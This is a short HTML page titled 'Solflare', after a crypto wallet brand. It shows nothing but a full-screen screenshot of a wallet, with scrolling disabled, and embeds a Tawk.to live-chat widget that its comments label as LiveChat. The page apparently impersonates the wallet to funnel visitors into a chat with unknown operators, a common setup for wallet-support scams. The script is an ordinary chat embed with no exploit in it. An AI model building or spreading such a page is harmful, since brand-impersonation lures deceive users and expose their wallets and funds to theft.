<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Solflare</title>
    <link rel="icon" href="icon.png" type="image/png" />
    <style>
      /* Reset body and html margins */
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
      }
      html,
      body {
        height: 100%;
        overflow: hidden; /* Disable scrolling */
      }
      a {
        display: block;
        width: 100%;
        height: 100%;
      }
      img {
        width: 100%; /* Stretch image to full width */
        height: 100%; /* Stretch image to full height */
        object-fit: cover; /* Make sure the image covers the entire area */
      }
    </style>
  </head>
  <body>
    <img src="SAVE_20241231_240902~3.jpg" alt="solflare wallet" />
    <!-- Start of LiveChat (www.livechat.com) code -->
    <script type="text/javascript">
      var Tawk_API = Tawk_API || {},
        Tawk_LoadStart = new Date();
      (function () {
        var s1 = document.createElement("script"),
          s0 = document.getElementsByTagName("script")[0];
        s1.async = true;
        s1.src = "https://embed.tawk.to/66a2a258becc2fed692b2b32/1i3lkkb6g";
        s1.charset = "UTF-8";
        s1.setAttribute("crossorigin", "*");
        s0.parentNode.insertBefore(s1, s0);
      })();
    </script>
    <noscript
      ><a href="https://www.livechat.com/chat-with/18929835/" rel="nofollow"
        >Chat with us</a
      >, powered by
      <a
        href="https://www.livechat.com/?welcome"
        rel="noopener nofollow"
        target="_blank"
        >LiveChat</a
      ></noscript
    >
    <!-- End of LiveChat code -->
  </body>
</html>
